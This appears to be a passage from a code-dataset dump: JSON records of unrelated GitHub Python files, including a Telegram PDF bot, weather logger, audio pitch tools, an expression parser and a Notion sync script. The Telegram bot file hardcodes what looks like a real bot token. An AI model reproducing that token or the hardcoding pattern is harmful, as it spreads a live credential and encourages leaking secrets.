Replace 'your_token_here' with your actual bot token\nbot_token = '6595930371:AAEpa4_PDY_fE8i9Lr7JM33oF4tCyojYllo'\n\n# Initialize the bot\nbot = telebot.TeleBot(bot_token)\n\n# Create a dictionary to map user queries to PDF file paths\nquery_to_pdf = {\n \"treatment of cold\": \"pdfs/cold_treatment.pdf\",\n \"ayurvedic remedies\": \"pdfs/ayurvedic_remedies.pdf\",\n \"some other query\": \"pdfs/some_other.pdf\",\n \"Panchakarma\": \"pdf/Panchakarma(Short book)@Bamsbooksin.pdf\",\n # Add mappings for all your PDF files (100 PDFs)\n # For example:\n \"keyword1\": \"pdfs/pdf1.pdf\",\n \"keyword2\": \"pdfs/pdf2.pdf\",\n \"panchakarma\": \"pdf/Panchakarma(Short book)@Bamsbooksin.pdf\",\n # Continue adding mappings for all 100 PDF files\n}\n\n# Define a function to handle user queries\n@bot.message_handler(commands=['start'])\ndef handle_start(message):\n bot.send_message(message.chat.id, \"Welcome to the Ayurvedic PDF Bot! Send me a keyword to search for PDFs.\")\n\n@bot.message_handler(func=lambda message: message.text.lower() in ['hi', 'hello'])\ndef handle_greeting(message):\n bot.send_message(message.chat.id, f\"Hello, {message.from_user.first_name}!\")\n\n@bot.message_handler(func=lambda message: message.text.lower() == 'who are you')\ndef handle_whoami(message):\n bot.send_message(message.chat.id, \"I am the Ayurvedic PDF Bot. I'm here to help you find and download PDFs.\")\n\n@bot.message_handler(func=lambda message: message.text.lower() == 'thanks')\ndef handle_thanks(message):\n bot.send_message(message.chat.id, \"You're welcome! If you have any more questions or need PDFs, feel free to ask.\")\n\n@bot.message_handler(func=lambda message: message.text.lower() == 'what is this')\ndef handle_whatisthis(message):\n bot.send_message(message.chat.id, \"This is the Ayurvedic PDF Bot. You can use it to search for and download Ayurvedic PDFs by sending keywords.\")\n\n@bot.message_handler(func=lambda message: True)\ndef handle_query(message):\n search_query = message.text.lower()\n \n if search_query in query_to_pdf:\n pdf_path = query_to_pdf[search_query]\n with open(pdf_path, 'rb') as pdf_file:\n bot.send_document(message.chat.id, pdf_file, caption=f\"PDF: {search_query}\")\n else:\n # Send a GIF with the message \"No PDFs found\" when no matching PDF is found\n gif_path = 'no_matching_pdf.gif' # Replace with the actual path to your GIF\n with open(gif_path, 'rb') as gif_file:\n bot.send_animation(message.chat.id, gif_file, caption=\"No PDFs found\")\n\n# Start the bot\nif __name__ == \"__main__\":\n bot.polling(none_stop=True)\n","repo_name":"zeviplex/zeviayurpathsala","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":2615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2892423793","text":"from PyQt5.QtWidgets import QCheckBox, QMessageBox\r\nfrom GUI.graph import GraphWidget\r\nfrom Backend.config import Singleton\r\nfrom Backend.exceptions import UnableToAddMoreCountriesToGraph\r\n\r\n\r\nclass Cbx(QCheckBox):\r\n def __init__(self, parent, name):\r\n super().__init__(name)\r\n self.__parent = parent\r\n\r\n self.clicked.connect(self.__func_to())\r\n\r\n def __func_to(self):\r\n return lambda _: self.__on_click()\r\n\r\n def __on_click(self):\r\n data = Singleton.get_instance()\r\n name = self.text()\r\n try:\r\n if name in data.get_countries_list():\r\n data.remove_country(name)\r\n self.__update_graph()\r\n else:\r\n if len(data.get_countries_list()) > 5:\r\n self.setChecked(False)\r\n raise UnableToAddMoreCountriesToGraph()\r\n else:\r\n data.add_country(name)\r\n self.__update_graph()\r\n\r\n except UnableToAddMoreCountriesToGraph as err:\r\n msg = QMessageBox()\r\n msg.setWindowTitle(\"Caught error\")\r\n msg.setText(f\"{err}\")\r\n msg.exec_()\r\n\r\n def __update_graph(self):\r\n plot = GraphWidget(self.__parent, \"Ozdrowieni\")\r\n plot.update_graph()\r\n\r\n def show(self):\r\n self.setVisible(True)\r\n\r\n def hide(self):\r\n self.setVisible(False)\r\n","repo_name":"kepinskw/Python-19","sub_path":"Python-19/GUI/checkboxes.py","file_name":"checkboxes.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"47419880808","text":"import io\nimport ast\nimport os\nimport requests\nimport csv\nimport json\nimport datetime\nimport logging\nimport argparse\nimport configparser\ndef log_now():\n parser=argparse.ArgumentParser()\n parser.add_argument('--do_logging', action='store_true')\n parser.add_argument(\"-c\", \"--conf_file\",help=\"Specify config file\", metavar=\"FILE\")\n params=parser.parse_args()\n # args, remaining_argv = parser.parse_known_args()\n parameters={}\n print(params.conf_file)\n if not params.conf_file:\n params.conf_file=\"~/.weather_app_config\"\n params.conf_file=os.path.expanduser(params.conf_file)\n config = configparser.SafeConfigParser()\n config.read([params.conf_file])\n parameters.update(dict(config.items(\"Defaults\")))\n parameters.update({\"do_logging\":params.do_logging})\n weather_obj=log_weather(parameters)\n #a=log_weather(temp_loc, rain_loc, url,params,arg.do_logging)\n weather_obj.log_data()\n \nclass log_weather:\n\n #parms={'dataType':'CLMTEMP', 'station':'HPV', 'rformat':'csv', 'year':'2020'}\n def __init__(self,params):\n self.loc_temp=params[\"temp_loc\"]\n self.loc_rain=params[\"rain_loc\"]\n self.url=params[\"url\"]\n self.params=ast.literal_eval(params[\"url_params\"])\n self.dologging=params[\"do_logging\"]\n curtime=datetime.datetime.now()\n #date_target={'year': curtime.year, 'month': curtime.month, 'day': curtime.day}\n self.datelog=curtime.strftime(\"%Y_%m_%d\")\n self.timelog=curtime.strftime(\"%H:%M:%S\")\n self.header=\"Time_logged, Temperature at \"+self.loc_temp+\", Rainfall at \"+self.loc_rain+'\\n' \n logs_folder='~/logs_weather/'\n logs_folder=os.path.expanduser(logs_folder)\n if not os.path.isdir(logs_folder):\n os.mkdir(logs_folder)\n self.pathtofile=logs_folder+self.datelog\n self.pathtolog=logs_folder+\"debug_log\"\n if self.dologging:\n logging.basicConfig(filename=self.pathtolog, level=logging.DEBUG)\n#, encoding='utf-8'\n if not os.path.isfile(self.pathtofile):\n with open(self.pathtofile,'w') as f:\n f.write(self.header)\n\n def get_response(self, url, parms):\n response=requests.get(url, params=parms)\n if response.ok:\n data=response.text\n else:\n raise \"Invalid response obtained\"\n return response.text\n def log_data(self):\n data=self.get_response(self.url, self.params)\n data_f=json.loads(data)\n temperature_data=data_f[\"temperature\"][\"data\"]\n rainfall_data=data_f[\"rainfall\"][\"data\"]\n #print(temperature_data)\n #print(rainfall_data)\n templog=None\n rainlog=None\n for d in temperature_data:\n if d[\"place\"]==self.loc_temp:\n templog=d[\"value\"]\n for d in rainfall_data:\n if d[\"place\"]==self.loc_rain:\n rainlog=d[\"max\"]\n if templog==None:\n if self.dologging:\n logging.info(self.datelog+\"::\"+self.timelog+\":: Temperature value for \"+self.loc_temp+\" doesn't exist. Please try another location\")\n templog=-1\n if rainlog==None:\n if self.dologging:\n logging.info(self.datelog+\"::\"+self.timelog+\":: Rainfall value for \"+self.loc_rain+\" doesn't exist. Please try another location\")\n rainlog=-1\n # print(rainlog)\n # print(templog)\n #print(json.dumps(data_f, indent=4, sort_keys=True))\n# f=io.StringIO(data)\n# found=False\n# prev_row=[]\n# row=[]\n# for row in csv.reader(f):\n# if row[0]==str(self.date_target['year']):\n# found=True\n# elif found==True:\n# temp_found=float(prev_row[3])\n# date_found={'year': int(prev_row[0]), 'month':int(prev_row[1]), 'day':int(prev_row[2])}\n# break\n# prev_row=row\n# if date_found!=self.date_target:\n# print(\"Warning! data for target date not found, most recent date is\", date_found)\n# else:\n# print(\"Found data for the day we were looking for\")\n with open(self.pathtofile, 'a') as f:\n strtowrite=self.timelog+','+str(templog)+','+str(rainlog)+'\\n'\n print(strtowrite)\n f.write(strtowrite)\n\n","repo_name":"rahulraj1255/weather-logger","sub_path":"poetry_package/weather_logger/get_weather_info.py","file_name":"get_weather_info.py","file_ext":"py","file_size_in_byte":4320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39814387231","text":"# Check if a given string is a palindrome.\n\ndef is_palindrome(text: str) -> bool:\n\treturn traverse(text, 0, len(text) - 1)\n\ndef traverse(text: str, i: int, j: int) -> bool:\n\tif i > j:\n\t\treturn True\n\t\n\tif text[i] != text[j]:\n\t\treturn False\n\t\n\treturn traverse(text, i + 1, j - 1)\n\nassert is_palindrome('mama') == False\nassert is_palindrome('akka') == True\n\t\t\n\t","repo_name":"ErickMwazonga/sifu","sub_path":"recursion/learning/is_palindrome.py","file_name":"is_palindrome.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"52"} +{"seq_id":"37923653660","text":"import random\n\nimport numpy as np\nimport parselmouth\nfrom parselmouth.praat import call\n\n\ndef change_pitch(sound, factor):\n manipulation = call(sound, \"To Manipulation\", 0.01, 75, 600)\n\n pitch_tier = call(manipulation, \"Extract pitch tier\")\n\n # Arguments : Time range (s), Time range (s), Frequency shift, Unit\n call(pitch_tier, \"Shift frequencies\", 0, 1000, factor, \"semitones\")\n\n call([pitch_tier, manipulation], \"Replace pitch tier\")\n return call(manipulation, \"Get resynthesis (overlap-add)\")\n\n\ndef change_formant(\n sound, formant_shift_ratio, pitch_shift_ratio, pitch_range_factor, duration_factor\n):\n # https://www.fon.hum.uva.nl/praat/manual/Sound__Change_gender___.html\n # Arguments : Minimum pitch(Hz), Maximum pitch(Hz), Formant shift ratio, New pitch median(Hz), Pitch range factor, Duration factor\n # formant_shift_ratio should be around 0.8-1.2 (N(1.,0.2))\n # A ratio of 1.1 will change a male voice to a voice with approximate female formant characteristics.\n # A ratio of 1/1.1 will change a female voice to a voice with approximate male formant characteristics.\n\n # Pitch range factor should be in between 0.8-1.2 (N(1.,0.2))\n\n # duration_factor should be in between 0.9-1.1 N(1.,0.1))\n\n return call(\n sound,\n \"Change gender\",\n 75,\n 600,\n formant_shift_ratio,\n pitch_shift_ratio,\n pitch_range_factor,\n duration_factor,\n )\n\n\ndef change_pitch_and_formant_random(audio, sample_rate):\n sound = parselmouth.Sound(audio, sampling_frequency=sample_rate)\n original_size = sound.values.shape[1] # shape of sound.values is [1, audio_length]\n pitch_shift_ratio = random.uniform(-0.2, 0.2) # -15 to +15 cents\n pitch_shift_ratio = random.choice([-12, 0, 12]) + pitch_shift_ratio\n\n sound = change_pitch(sound, pitch_shift_ratio) # -15 to +15 cents\n\n formant_shift_ratio = random.uniform(1, 1.4)\n formant_shift_ratio = random.choice([formant_shift_ratio, 1 / formant_shift_ratio])\n\n sound = change_formant(\n sound, formant_shift_ratio, 0.0, 1, max(0.7, random.normalvariate(1.0, 0.05))\n )\n\n output = sound.values[0] # shape of sound.values is [1, audio_length]\n if output.shape[0] >= original_size:\n output = output[:original_size]\n else:\n output = np.pad(output, (0, original_size - output.shape[0]))\n\n return output\n\n\ndef change_pitch_and_formant(\n audio,\n sample_rate,\n pitch_shift_ratio,\n formant_shift_ratio,\n pitch_range_ratio,\n time_stretch_ratio,\n):\n sound = parselmouth.Sound(audio, sampling_frequency=sample_rate)\n original_size = sound.values.shape[1] # shape of sound.values is [1, audio_length]\n\n # sound = change_pitch(sound, random.uniform(-0.15, 0.15)) # -15 to +15 cents\n sound = change_pitch(sound, pitch_shift_ratio) # -15 to +15 cents\n sound = change_formant(\n sound, formant_shift_ratio, 0.0, pitch_range_ratio, time_stretch_ratio\n )\n\n output = sound.values[0] # shape of sound.values is [1, audio_length]\n if output.shape[0] >= original_size:\n output = output[:original_size]\n else:\n output = np.pad(output, (0, original_size - output.shape[0]))\n\n return output\n","repo_name":"jeonchangbin49/MedleyVox","sub_path":"svs/utils/parselmouth_utils.py","file_name":"parselmouth_utils.py","file_ext":"py","file_size_in_byte":3225,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"52"} +{"seq_id":"19835496387","text":"from search_engine_parser import GoogleSearch\n\nfrom userge import userge, Message\n\nGoogleSearch.parse_soup = lambda __, _: _.find_all(\"div\", class_=\"Gx5Zad fP1Qef xpd EtOod pkphOe\")\n\n\n@userge.on_cmd(\"google\", about={\n 'header': \"do a Google search\",\n 'flags': {\n '-p': \"page of results to return (default to 1)\",\n '-l': \"limit the number of returned results (defaults to 5)(max 10)\"},\n 'usage': \"{tr}google [flags] [query | reply to msg]\",\n 'examples': \"{tr}google -p4 -l10 github-userge\"})\nasync def gsearch(message: Message):\n query = message.filtered_input_str\n await message.edit(f\"**Googling** for `{query}` ...\")\n flags = message.flags\n page = int(flags.get('-p', 1))\n limit = int(flags.get('-l', 5))\n if message.reply_to_message:\n query = message.reply_to_message.text\n if not query:\n await message.err(\"Give a query or reply to a message to google!\")\n return\n try:\n g_search = GoogleSearch()\n gresults = await g_search.async_search(query, page)\n except Exception as e:\n await message.err(e)\n return\n output = \"\"\n for i in range(limit):\n try:\n title = gresults[\"titles\"][i].replace(\"\\n\", \" \")\n link = gresults[\"links\"][i]\n desc = gresults[\"descriptions\"][i]\n output += f\"[{title}]({link})\\n\"\n output += f\"`{desc}`\\n\\n\"\n except (IndexError, KeyError):\n break\n output = f\"**Google Search:**\\n`{query}`\\n\\n**Results:**\\n{output}\"\n await message.edit_or_send_as_file(text=output, caption=query,\n disable_web_page_preview=True)\n","repo_name":"UsergeTeam/Userge-Plugins","sub_path":"plugins/utils/google/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1662,"program_lang":"python","lang":"en","doc_type":"code","stars":133,"dataset":"github-code","pt":"52"} +{"seq_id":"37894208825","text":"import argparse\nimport os, sys\nscript_dir = os.path.dirname(os.path.realpath(__file__))\nsys.path.insert(0, os.path.join(script_dir, \"../../\"))\nimport model.build_model\nimport python_server.mapping_features\nimport pandas as pd\nimport matplotlib\nmatplotlib.use(\"Agg\")\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport glob\nfrom os import listdir\nfrom os.path import basename, join, isdir, isfile\nimport math\nimport numpy as np\nimport yaml\nfrom capnp_serial import mapping_capnp\n\ndef calculate_hue_fraction(observation, color):\n feature = observation.feats.feats[0]\n if feature.type == mapping_capnp.Feature.Type.fullColorHistogram:\n whole_histo = feature.feat.wholeHisto.histo\n hues = whole_histo.counts[0].count\n total_pixels = whole_histo.totalCountedPixels\n\n hue_count = 0\n for (low, high) in color:\n for idx in range(low, high):\n hue_count += hues[idx]\n hf = hue_count/float(total_pixels) \n return hf\n elif feature.type == mapping_capnp.Feature.Type.hsvHistogram:\n hists = feature.feat.hsvHisto.colorHistograms \n fg_pixels = feature.feat.hsvHisto.totalCountedPixels\n if len(hists) > 1:\n print (\"Multi color not supported rn. Exiting.\")\n exit(1)\n hist = hists[0]\n \n total_color_pixels = 0\n for row_idx in range(len(hist.valueBins)):\n row = hist.valueBins[row_idx]\n for col_idx in range(len(row.counts)):\n col = row.counts[col_idx]\n total_color_pixels += col\n hue_fraction = total_color_pixels/fg_pixels\n return hue_fraction\n\ndef main(training_conf_dir):\n with open(join(training_conf_dir, \"conf.yaml\")) as f:\n conf = yaml.safe_load(f)\n colors = {}\n for hue_bin in conf[\"hue_bins\"]:\n name = hue_bin[\"name\"]\n colors[name] = []\n for r in hue_bin[\"ranges\"]:\n colors[name].append((r[\"start\"], r[\"end\"]))\n\n training_dir = conf[\"training_dir\"]\n vids = [d for d in listdir(training_dir) if isdir(join(training_dir, d))]\n for vid in vids:\n vid_dir = join(training_dir, vid)\n bin_file = [join(vid_dir, f) for f in listdir(vid_dir) if isfile(join(vid_dir, f)) and f.endswith(\".bin\")][0]\n # Extracting the features from training data samples\n observations = python_server.mapping_features.read_samples(bin_file)\n frame_id=0\n\n color_hfs = {}\n for color in colors:\n color_hfs[color] = []\n\n for observation in observations:\n if frame_id < 1:\n frame_id += 1\n continue\n\n label = observation.label\n if not label:\n frame_id += 1\n continue\n \n feature = observation.feats.feats[0]\n for color in colors:\n hf = calculate_hue_fraction(observation, colors[color])\n color_hfs[color].append(hf)\n frame_id += 1\n print (vid, end=\"\\t\")\n for color in colors:\n print (min(color_hfs[color]), end=\"\\t\")\n print (\"\")\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Analyzing what should be the cutoff Hue Fraction.\")\n parser.add_argument(\"-C\", dest=\"training_conf_dir\", help=\"Path to training conf folder\")\n\n args = parser.parse_args()\n main(args.training_conf_dir)\n\n","repo_name":"esaurez/LoadShedderInterface","sub_path":"src/color_analysis/hue_analysis/hue_fraction_analysis.py","file_name":"hue_fraction_analysis.py","file_ext":"py","file_size_in_byte":3426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20475380054","text":"\"\"\"binaryreader.py: EXT2 Binary reader for file value extraction.\"\"\"\n\n__author__ = \"Frederik Bußmann\"\n__license__ = \"MIT\"\n__version__ = \"1.0.0\"\n__maintainer__ = \"Frederik Bußmann\"\n__email__ = \"frederik@bussmann.io\"\n\n\nimport struct\n\n\nclass BinaryReader(object):\n \"\"\"\n A binary reader for converting multiple values from a bytearray with error checks.\n\n Attributes\n ----------\n binary_data : bytes\n The byte array to extract values from.\n error : bool\n The error state of the reader.\n \"\"\"\n\n def __init__(self, data):\n \"\"\"\n Class constructor.\n\n Parameters\n ----------\n data : bytes\n The byte array to extract values from.\n \"\"\"\n\n self.binary_data = data\n self.error = False\n\n def get_data_from_binary(self, start_position, end_position, byte_format):\n \"\"\"\n Gets a value from the given binary data file and excepts read errors.\n\n Parameters\n ----------\n start_position : int\n The first index bit of the value.\n end_position : int\n The last index bit of the value.\n byte_format : str\n The format of the value ( max_priority:\n return parse_unary()\n\n left = parse_bin(priority + 1)\n ops = ops_by_priority(priority)\n\n while has() and current().type == TokenType.OPERATION:\n pos = current().pos\n for op in ops:\n if accept(TokenType.OPERATION, op.symbol):\n right = parse_bin(priority + 1 - op.rtl)\n left = BinOpNode(pos, op, left, right)\n break\n else:\n break\n\n return left\n\n def parse_unary():\n for op in unary_operators:\n pos = index\n if accept(TokenType.OPERATION, op.symbol):\n return UnaryOpNode(pos, op, parse_unary())\n\n return parse_call()\n\n def parse_call():\n head = parse_term()\n\n if isinstance(head, IdentifierNode) and accept(TokenType.PARENTHESIS, \"(\"):\n arg = parse_expr()\n expect(TokenType.PARENTHESIS, \")\")\n return CallNode(head.pos, head.val, arg)\n\n return head\n\n def parse_term():\n token = current()\n\n if token.type == TokenType.NUMBER:\n return NumberNode(token.pos, expect(TokenType.NUMBER).val)\n elif token.type == TokenType.IDENTIFIER:\n return IdentifierNode(token.pos, expect(TokenType.IDENTIFIER).val)\n elif accept(TokenType.PARENTHESIS, \"(\"):\n val = parse_expr()\n expect(TokenType.PARENTHESIS, \")\")\n return val\n else:\n raise ParseError(\n f\"expected term, got {stringify_rule(token.type, token.val)}\", token.pos)\n\n def parse_expr():\n nonlocal index\n left = parse_bin()\n if index < len(tokens):\n old = index\n try:\n right = parse_expr()\n return BinOpNode(right.pos, operators[2], left, right)\n except:\n index = old\n return left\n\n return parse_expr()\n\n\n@dataclass\nclass EvalContext:\n variables: dict\n functions: dict\n\n def get_var(self, name):\n return self.variables[name]\n\n def get_func(self, name):\n return self.functions[name]\n\n\ndef get_default_context():\n import cmath\n import math\n from numbers import Number\n from itertools import chain\n\n ctx = EvalContext(\n {**{k: v for (k, v) in cmath.__dict__.items() if not k.startswith(\"_\")\n and isinstance(v, Number)}, **{\"i\": 1j, \"j\": 1j}},\n {k: v for (k, v) in chain(math.__dict__.items(\n ), cmath.__dict__.items()) if not k.startswith(\"_\") and callable(v)}\n )\n\n return ctx\n\n\ndefc = get_default_context()\n\n\ndef evalstr(inp: str, parentctx: EvalContext = None):\n if parentctx is None:\n parentctx = defc\n ctx = EvalContext(parentctx.variables.copy(), parentctx.functions.copy())\n while True:\n try:\n tok = tokenize(inp)\n tree = parse(tok)\n print(tree)\n print(tree.write())\n return tree.eval(ctx)\n except UndeclaredVarError as e:\n value = input(f\"value for '{e.var}'? \")\n if not value:\n return None\n value = evalstr(value, ctx)\n if not value:\n return None\n ctx.variables[e.var] = value\n continue\n\n\nwhile True:\n inp = input(\"> \")\n if inp == \"?\":\n print(\"functions:\")\n print(\" \" + \", \".join(ctx.functions.keys()))\n print(\"variables:\")\n print(\" \" + \", \".join(ctx.variables.keys()))\n else:\n try:\n res = evalstr(inp)\n if res is None:\n print(\"-- cancelled\")\n else:\n if res.imag == 0:\n res = res.real\n print(res)\n except ParseError as e:\n print((2 + e.pos) * \" \" + \"↑\")\n print(str(e) + \" at \" + str(e.pos))\n except Exception as e:\n print(str(e))\n print()\n","repo_name":"zdimension/simplecalc","sub_path":"calc.py","file_name":"calc.py","file_ext":"py","file_size_in_byte":10308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12669516616","text":"\nimport sys\n\nlines = sys.stdin.readlines()\nnums = map(int, lines)\n\nx, y = 0, 0\nfor line in lines:\n dir, amt = line.split()\n amt = int(amt)\n if dir == \"forward\":\n x += amt\n elif dir == \"down\":\n y += amt\n elif dir == \"up\":\n y -= amt\n\nprint(x * y)\n\nx, y, aim = 0, 0, 0\nfor line in lines:\n dir, amt = line.split()\n amt = int(amt)\n if dir == \"forward\":\n x += amt\n y += aim * amt\n elif dir == \"down\":\n aim += amt\n elif dir == \"up\":\n aim -= amt\nprint(x * y)\n","repo_name":"nathanlo99/adventofcode","sub_path":"2021/day2.py","file_name":"day2.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3651977481","text":"import tkinter, datetime, random\r\nfrom tkinter import*\r\n\r\nchoice_color = ('red', 'blue', 'green', 'yellow', 'orange', 'purple', 'aqua',\r\n 'teal', 'powder blue', 'steel blue', 'brown', 'black', 'white', 'pink', 'grey')\r\nchoice_color2 = ('teal', 'powder blue', 'aqua', 'grey')\r\nfav_color = input('Will you prefer auto generation or manual(a/m) \\n')\r\n\r\nroot = Tk()\r\nroot.title('Clock & Alarms')\r\nroot.geometry('500x500+25+50')\r\nroot.minsize(width = 220, height = 65)\r\n#root.maxsize(width = 500, height = 500)\r\ntime1 = StringVar()\r\n#root.configure(background = Random_Color(choice_color))\r\ndef Manual_Color():\r\n try:\r\n manual_color = input('What color would you prefer for your backgorund\\n')\r\n return manual_color\r\n except Exception as msg:\r\n print('UnknownColorNameError: [%s]' %(msg))\r\n\r\n\r\ndef Auto_Color(color_tuple):\r\n rand_color = random.choice(color_tuple)\r\n return rand_color\r\n\r\ndef Current_Time():\r\n try:\r\n from datetime import datetime as time_obj\r\n import datetime as date_obj\r\n import time\r\n \r\n seconds_delta = date_obj.timedelta(seconds = 1)\r\n today = time_obj.now()\r\n current_period = time_obj(today.year, today.month, today.day, \r\n today.hour, today.minute, today.second)\r\n while(True):\r\n hours = current_period.hour\r\n minutes = current_period.minute\r\n seconds = current_period.second\r\n\r\n i = 1\r\n i += seconds\r\n time.sleep(1)\r\n root.update()\r\n return ('{0} : {1} : {2}'.format(hours, minutes, i))\r\n \r\n except Exception as msg:\r\n print('[%s]' %(msg))\r\n\r\ndef Refresh_Time():\r\n root.update()\r\n '''import datetime as date_obj\r\n from datetime import datetime as time_obj\r\n import time, itertools\r\n \r\n seconds_delta = date_obj.timedelta(seconds = 1)\r\n today = time_obj.now()\r\n current_period = time_obj(today.year, today.month, today.day, \r\n today.hour, today.minute, today.second)\r\n\r\n hours = current_period.hour\r\n minutes = current_period.minute\r\n seconds = 0#current_period.second\r\n time1.set('{0} : {1} : {2}'.format(hours, minutes, 13))\r\n if root.update():\r\n while (c for c in itertools.cycle(range(0,60, 1))):\r\n time.sleep(1)\r\n time.set('{0} : {1} : {2}'.format(hours, minutes, c))'''\r\n\r\n #hour += hour*60*60\r\n\r\nif fav_color == 'm':\r\n root.configure(background = Manual_Color())\r\nelse:\r\n root.configure(background = Auto_Color(choice_color))\r\n\r\n\r\nmid_frame = Frame(root, relief = 'flat', height = 400, width = 400,\r\n bg =Auto_Color(choice_color2), bd = 0).grid(sticky = N, padx = 1, pady = 1)\r\n\r\ntime_box = Label(root, font = ('serif', 30, 'bold'), text = Current_Time(),\r\n bd = 2, padx = 2, pady = 2, fg ='black', bg = 'white').grid(row=5, column=5) \r\n'''\r\nrefresh_box = Label(mid_frame, font = ('serif', 30, 'bold'), textvariable = time1,\r\n bd = 2, padx = 2, pady = 2, fg ='black', bg = 'white').grid(row=5, column=5) \r\n'''\r\nbtnRefresh= Button(root, text='Refresh', padx=2, pady=2, bd=2, fg='black',\r\n font=('arial',10,'bold'), width=12, height=1, command=Refresh_Time()).grid(row=3,column=0)\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n mainloop()\r\n\r\n","repo_name":"Sambou-kinteh/Pythonmodules","sub_path":"clock_face.py","file_name":"clock_face.py","file_ext":"py","file_size_in_byte":3535,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"33861804592","text":"\"\"\"\n560. Subarray Sum Equals K\nhttps://leetcode.com/problems/subarray-sum-equals-k/\n\nGiven an array of integers and an integer k, you need to find the total number of continuous subarrays whose sum equals to k.\n\nExample 1:\n\nInput:nums = [1,1,1], k = 2\nOutput: 2\nNote:\n\nThe length of the array is in range [1, 20,000].\nThe range of numbers in the array is [-1000, 1000] and the range of the integer k is [-1e7, 1e7].\n\n\"\"\"\n\nclass Solution:\n def subarraySum(self, nums: List[int], k: int) -> int:\n d = {}\n d[0] = 1\n s = 0\n count = 0\n for i in range(len(nums)):\n s += nums[i]\n if s-k in d: # --- I\n count += d[s-k]\n # or return True\n # or return indicies\n\n # add sum to frq dict\n if s in d:\n d[s] += 1 # --- II\n else:\n d[s] = 1\n\n return count\n\n\n \t # COMMENT -- I\n \t # ---------------\n \t # Single scan. Given the current sum and the k, we check if (sum-k) existed as previous sum at an earlier stage ( aka smaller window size)\n \t # Keep expanding the sum while checking whether we have seen (sum - k) before\n \t\n \n \n # COMMENT -- II\n # ---------------\n # It's possible that the freq of a sum could be greater than 1 only when the nums list conatins a zero\n # ex: nums = [1,2,3,0,4]\n # because sum will be the same for two consecutive iterations.\n # it's important to capture this edge case in order to return the correct number of subarrays that\n # add up to target.\n # if we are guaranteed that the list nums has no zeros, then we can replace the prefix dict with a prefix set\n ","repo_name":"EvanTian233/Leetcode-solutions","sub_path":"Python_Solutions/DataStructure/3_HashTable/SubarraySum.py","file_name":"SubarraySum.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70029721444","text":"import sys\nimport asyncio\nimport logging\nfrom os import path\nfrom datetime import datetime, date\nimport pytz\nimport yaml\nimport json\nfrom notion_client import AsyncClient\n\n# read config\nCONFIG_PATH = './config.yaml'\nCACHE_PATH = './data/cache.json'\ntry:\n if path.exists(CONFIG_PATH):\n with open(CONFIG_PATH, \"r\") as f:\n CONFIG = yaml.safe_load(f)\n try:\n NOTION_KEY = CONFIG.get('notion').get('key')\n DB_ID = CONFIG.get('notion').get('database_id')\n FILTER = CONFIG.get('notion').get('filter')\n except:\n raise ValueError('Invalid config file, check the docs!')\n else:\n raise ValueError('config.yaml not found, check the docs!')\nexcept ValueError as e:\n print(e)\n sys.exit()\n\n\nclass Task(object):\n def __init__(\n self,\n name,\n source,\n start=None,\n due=None,\n priority=None,\n timestamp=None,\n notion_id=None,\n caldav_uid=None,\n cached=False\n ) -> None:\n self.name = name\n self.source = source\n self.start = start\n self.due = due\n self.priority = priority\n if timestamp:\n self.timestamp = timestamp\n else:\n self.timestamp = datetime.now(pytz.utc).isoformat()\n self.notion_id = notion_id\n self.caldav_uid = caldav_uid\n self.cached = cached\n \n @staticmethod\n def from_notion(page):\n task = Task('New Task', 'notion')\n task.update_with_notion(page)\n return task\n \n def update_with_notion(self, page):\n self.name = page.get('properties').get('Name').get('title')[0].get('text').get('content')\n self.source = 'notion'\n date_obj = page.get('properties').get(CONFIG.get('notion').get('date_property')).get('date')\n self.start, self.due = date_mapping(date_obj)\n self.timestamp = normalize_notion_timestamp(page.get('last_edited_time'))\n self.notion_id = page.get('id')\n\n\n async def to_notion(self, client):\n if self.notion_id:\n page = await client.pages.update(\n **{\n 'page_id': self.notion_id,\n 'properties': self.notion_properties()\n }\n )\n logging.debug(f'Updated page {self.notion_id}, {self.name}')\n else:\n page = await client.pages.create(\n **{\n 'parent': {\n \"type\": \"database_id\",\n \"database_id\": DB_ID\n },\n 'properties': self.notion_properties()\n }\n )\n self.notion_id = page.get('id')\n logging.debug(f'Created page {self.notion_id}, {self.name}')\n\n self.timestamp = \\\n normalize_notion_timestamp(page.get('last_edited_time'))\n logging.debug(f'Updated timestamp {self.timestamp}')\n return page\n\n\n def notion_properties(self):\n return { \n 'Name': {\n 'title': [\n {\n 'text': {\n 'content': self.name\n }\n }\n ]\n },\n CONFIG.get('notion').get('date_property'): {\n 'date': date_mapping((self.start, self.due))\n }\n }\n \n def __repr__(self) -> str:\n return f'Task({self.name})'\n\n\ndef get_notion_client(log_level=logging.WARNING):\n # return Client(\n return AsyncClient(\n auth=CONFIG.get('notion').get('key'),\n log_level=log_level\n )\n\n\nasync def query_notion_db(client):\n logging.debug(f'Config filter: {FILTER}')\n if isinstance(FILTER, dict) or FILTER is None:\n query_filter = FILTER\n else:\n query_filter = {\n 'property': FILTER,\n 'checkbox': {\n 'equals': True\n }\n }\n logging.debug(f'Query filter: {query_filter}')\n result = await client.databases.query(\n **{\n 'database_id': DB_ID,\n 'filter': query_filter\n }\n )\n return result.get('results')\n\n\ndef date_mapping(value):\n if isinstance(value, tuple):\n if value == (None, None):\n return None\n\n if value[0] is None:\n 